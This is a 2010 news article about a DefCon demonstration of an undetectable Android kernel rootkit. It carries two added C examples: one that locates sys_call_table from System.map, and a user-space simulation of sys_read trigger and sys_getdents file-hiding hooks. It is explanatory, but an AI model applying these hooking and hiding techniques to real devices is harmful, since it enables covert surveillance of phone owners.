Linux Vulnerability Allows Access to Smartphone System Hardware

Aug 06, 2010

By Dana Tierney, Senior Editor, Fusion Authority

In the last quarter of 2009, an estimated 485 million people had 3G cell phones; by 2020, that number is expected to reach ten billion. A majority of those users keep their phones with them at all times, particularly executives and information technology workers, Trustwave SpiderLabs researchers Christian Papathanasiou and Nicholas Percoco wrote in a white paper distributed at DefCon. Users also almost universally consider their smartphones more secure than a public computer. But malware can target these devices just like any others, with an added danger: the hardware abstraction that makes a smartphone easy to use also hides everything below the application layer from its owner, so an infection at that level goes undetected.

Percoco and Papathanasiou demonstrated at DefCon Saturday that the wildly popular Android, which runs on a Linux 2.6.x kernel, can be infected with a kernel-level rootkit that the user cannot detect and that then has access to system hardware such as the camera, microphone and GPS. The SpiderLabs researchers' exploit required physical access to the phone and a subsequent phone call to trigger it, but another vulnerability demonstrated at DefCon could probably be used to remove that inconvenience, they said at a press conference, "using their attack and our payload."

Alternatively, a rootkit conceivably could ship with the phone by government mandate, they added, citing a Blackberry "update" by United Arab Emirates mobile carrier Etisalat, which many considered malware. That update, which allowed lawful intercepts of user information, was written by a US firm, SS8.

Android relies on the Linux kernel for all I/O with the hardware, and the user cannot see below the application layer. Any performance issues will probably be shrugged off as a bug as the user reboots, Percoco said at a press conference.

The SpiderLabs rootkit demonstrated at DefCon can redirect outbound calls by hooking sys_write and rewriting the buffer that carries the dial command. It can also read the GPS through the device node /dev/smd27. The researchers believe other smartphones whose kernels accept loadable kernel modules, which is what makes this infection possible, may be vulnerable in the same way, but so far they have tested the rootkit only on Android.

How It Works

Most of Android's functionality lives in the libraries just below the application layer. A SQLite database provides storage for call records and SMS records. But it is the Linux kernel at the next layer down that controls the hardware.

Unlike user-space rootkits, kernel rootkits can hide processes from /proc, so ps will not show them, and can hide the module itself, so lsmod will not list it. They work through "hooks": the rootkit overwrites the stored address of a given kernel function with the address of its own code, which then executes every time that function is called and can inspect, alter, or simply pass through the original behavior.

System calls, which handle file, process and network operations, are dispatched through an array of function pointers called sys_call_table. Kernel versions since 2.5 no longer export this table to modules, but its address can still be found in the System.map file generated for that kernel build, so a module can locate and patch it anyway.
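As an added illustration of what "found in System.map" means in practice (this is example code, not code from the talk or the white paper): a small parser that pulls the address of sys_call_table out of System.map text and computes the table slot a hook would overwrite. The map excerpt and its addresses are constructed for the example; the ARM EABI syscall numbers (read = 3, write = 4, getdents = 141) are the real ones for the 32-bit ARM kernels Android ran at the time, and the 4-byte pointer size is an assumption of that architecture.

```c
/*
 * Added example, not code from the SpiderLabs talk: locate sys_call_table in a
 * System.map file. System.map lists "address type symbol" per line; a module
 * that cannot import the symbol can hard-code the address found here for the
 * exact kernel build it targets. The excerpt below and its addresses are
 * constructed for the example; the ARM EABI syscall numbers are real.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed System.map excerpt (addresses are made up). */
static const char SAMPLE_SYSTEM_MAP[] =
    "c0008000 T stext\n"
    "c000a1c4 T sys_read\n"
    "c000a2e8 T sys_readv\n"
    "c002e8f0 R sys_call_table\n"
    "c0031a40 T sys_getdents\n";

/* ARM EABI system call numbers for the calls the article says were hooked. */
enum { NR_read = 3, NR_write = 4, NR_getdents = 141 };

/*
 * Return the address of `name` in System.map-style text, or 0 if absent.
 * The symbol column is compared whole, so "sys_read" never matches "sys_readv".
 */
unsigned long find_symbol(const char *map, const char *name) {
    const char *line = map;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char tmp[256], addr[32], type[4], sym[128];
        if (len < sizeof tmp) {
            memcpy(tmp, line, len);
            tmp[len] = '\0';
            if (sscanf(tmp, "%31s %3s %127s", addr, type, sym) == 3
                && strcmp(sym, name) == 0)
                return strtoul(addr, NULL, 16);
        }
        if (!nl) break;
        line = nl + 1;
    }
    return 0;
}

/*
 * Address of the table slot a hook would overwrite: the table is an array of
 * function pointers indexed by syscall number. ptr_size is 4 on the 32-bit ARM
 * kernels Android used at the time (an assumption of this example). Returns 0
 * when the table address itself is unknown.
 */
unsigned long syscall_slot(unsigned long table, unsigned int nr, unsigned int ptr_size) {
    return table ? table + (unsigned long)nr * ptr_size : 0;
}

int main(void) {
    unsigned long table = find_symbol(SAMPLE_SYSTEM_MAP, "sys_call_table");
    printf("sys_call_table at 0x%lx\n", table);
    printf("slot for sys_read (NR %d) at 0x%lx\n", NR_read, syscall_slot(table, NR_read, 4));
    printf("slot for sys_getdents (NR %d) at 0x%lx\n", NR_getdents, syscall_slot(table, NR_getdents, 4));
    return 0;
}
```

The practical caveat is the one the next paragraph runs into: the address is only valid for the exact kernel image the System.map was produced with, which is why the module's version string has to match the phone's kernel before any of this is usable.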

Papathanasiou and Percoco had problems building their module against the phone's kernel because of a version-magic mismatch (the vermagic string the kernel checks before loading a module), which they resolved by editing include/linux/utsrelease.h so the module's version string matched the running kernel. They then wrote a debug loadable kernel module to intercept and map system calls, and parsed dmesg to reveal the phone commands (AT commands to the radio) passing through them.

The rootkit hooks sys_read and scans the data returned from the radio for AT+CLCC responses, which list the calls in progress. If an entry's number matches the attacker's phone, the rootkit launches its payload: it uses the kernel's call_usermodehelper function to spawn a reverse-shell binary, which therefore appears as a child of the kernel event thread keventd, and that shell connects back to the attacker over a reverse TCP connection using the phone's mobile data or Wi-Fi link. Hooking sys_getdents let them hide the reverse-shell binary, which would otherwise have been visible in the file system.
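The following user-space simulation is an added example, not the SpiderLabs rootkit; it shows the mechanics of the paragraph above with ordinary function pointers instead of a kernel module: hooking a table entry, chaining to the original sys_read and scanning the returned data for the trigger caller in an AT+CLCC response, and chaining to sys_getdents and splicing hidden entries out of the directory buffer. The modem reply, the directory entries, the trigger number 15555550100 and the hidden-name prefix rs_ are all constructed; in the real rootkit the triggered branch is where call_usermodehelper() spawns the reverse shell.

```c
/* Added example, not the SpiderLabs rootkit: user-space simulation of the sys_read and
 * sys_getdents hooks described above. The "table" is an array of function pointers;
 * hooking saves the original pointer and overwrites the slot. Modem reply, directory
 * entries, trigger number and hidden prefix are all constructed. */
#include <stdio.h>
#include <string.h>

typedef long (*syscall_fn)(int fd, void *buf, unsigned long count);
static long real_read(int, void *, unsigned long);
static long real_getdents(int, void *, unsigned long);

enum { NR_read, NR_getdents, NR_COUNT };
static syscall_fn sys_call_table[NR_COUNT] = { real_read, real_getdents }; /* stand-in table */
static syscall_fn orig_read, orig_getdents;
static const char *TRIGGER_NUMBER = "15555550100";   /* hypothetical attacker number */
static const char *HIDE_PREFIX = "rs_";              /* hypothetical hidden-file prefix */
static int payload_triggered;

/* Packed record shaped like the kernel's linux_dirent: length first, then name. */
struct fake_dirent { unsigned short d_reclen; char d_name[30]; };
/* Constructed AT+CLCC reply: one incoming call (dir=1, stat=4) from the trigger number. */
static const char MODEM_REPLY[] = "+CLCC: 1,1,4,0,0,\"15555550100\",129\r\nOK\r\n";

static long real_read(int fd, void *buf, unsigned long count) {   /* "reads" the radio */
    unsigned long n = strlen(MODEM_REPLY) < count ? strlen(MODEM_REPLY) : count;
    (void)fd;
    memcpy(buf, MODEM_REPLY, n);
    return (long)n;
}

static long real_getdents(int fd, void *buf, unsigned long count) { /* three fake entries */
    static const char *names[] = { "init", "rs_reverse_shell", "sh" };
    struct fake_dirent *d = buf;
    unsigned long used = 0;
    (void)fd;
    for (int i = 0; i < 3 && used + sizeof *d <= count; i++, d++, used += sizeof *d) {
        d->d_reclen = sizeof *d;
        snprintf(d->d_name, sizeof d->d_name, "%s", names[i]);
    }
    return (long)used;
}

/* Pull the quoted number out of a "+CLCC:" line; returns 1 on success. */
int parse_clcc_number(const char *line, char *out, unsigned long outlen) {
    const char *p = strstr(line, "+CLCC:"), *q1, *q2;
    if (!p || !(q1 = strchr(p, '"')) || !(q2 = strchr(q1 + 1, '"'))) return 0;
    if ((unsigned long)(q2 - q1 - 1) >= outlen) return 0;
    memcpy(out, q1 + 1, (size_t)(q2 - q1 - 1));
    out[q2 - q1 - 1] = '\0';
    return 1;
}

/* sys_read hook: pass the call through, then look for the trigger caller in the data. */
static long hooked_read(int fd, void *buf, unsigned long count) {
    long n = orig_read(fd, buf, count);
    char scratch[256], number[32];
    if (n <= 0) return n;
    unsigned long len = (unsigned long)n < sizeof scratch - 1 ? (unsigned long)n : sizeof scratch - 1;
    memcpy(scratch, buf, len);                        /* the data is not NUL-terminated */
    scratch[len] = '\0';
    if (parse_clcc_number(scratch, number, sizeof number) && strcmp(number, TRIGGER_NUMBER) == 0)
        payload_triggered = 1;  /* the real rootkit calls call_usermodehelper() here */
    return n;
}

/* sys_getdents hook: splice hidden records out of the buffer and shrink the byte count. */
static long hooked_getdents(int fd, void *buf, unsigned long count) {
    long n = orig_getdents(fd, buf, count), off = 0;
    char *base = buf;
    while (off < n) {
        struct fake_dirent *d = (struct fake_dirent *)(base + off);
        unsigned short reclen = d->d_reclen;
        if (strncmp(d->d_name, HIDE_PREFIX, strlen(HIDE_PREFIX)) != 0) { off += reclen; continue; }
        memmove(base + off, base + off + reclen, (size_t)(n - off - reclen));
        n -= reclen;            /* the next record now sits at this offset */
    }
    return n;
}

/* Install both hooks once; the saved originals allow chaining and clean removal. */
void install_hooks(void) {
    if (orig_read) return;
    orig_read = sys_call_table[NR_read];
    orig_getdents = sys_call_table[NR_getdents];
    sys_call_table[NR_read] = hooked_read;
    sys_call_table[NR_getdents] = hooked_getdents;
}

/* Dispatch a read through the table as the RIL would; returns 1 if the trigger fired. */
int simulate_incoming_call(void) {
    char buf[256];
    payload_triggered = 0;
    sys_call_table[NR_read](3, buf, sizeof buf);
    return payload_triggered;
}

/* Dispatch a directory read through the table; returns how many entries stay visible. */
int simulate_listing(void) {
    struct fake_dirent buf[8];
    long n = sys_call_table[NR_getdents](4, buf, sizeof buf);
    int seen = 0;
    for (long off = 0; off < n; off += ((struct fake_dirent *)((char *)buf + off))->d_reclen) seen++;
    return seen;
}

int main(void) {
    printf("before hooks: trigger=%d visible=%d\n", simulate_incoming_call(), simulate_listing());
    install_hooks();
    printf("after hooks:  trigger=%d visible=%d\n", simulate_incoming_call(), simulate_listing());
    return 0;
}
```

Builds with any C99 compiler. Before install_hooks() the read reports no trigger and the listing shows three entries; afterwards the same read fires the trigger and the listing shrinks to two. That discrepancy between what a hooked listing returns and what the file system actually contains is the kind of inconsistency a rootkit detector looks for, and it is why the real module has to hide itself from lsmod as well.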

This allows the attacker to make calls with the phone, read mail and text messages, retrieve GPS information and conceivably to record events with the camera and microphone.

What Can Be Done?

"Clearly bad, when this is happening then it's game over," commented another researcher who had presented a different mobile vulnerability at DefCon.

The average consumer can't do much to prevent infection, but phone manufacturers could help prevent this type of exploit by requiring signed kernel modules, so that the kernel refuses to load any module not signed by a trusted key.


Dana Tierney is the Senior Editor at House of Fusion, where she causes authors to cry over their once-thought perfect articles. They recover, and their articles are better for it. But still, the sound of grown men weeping...


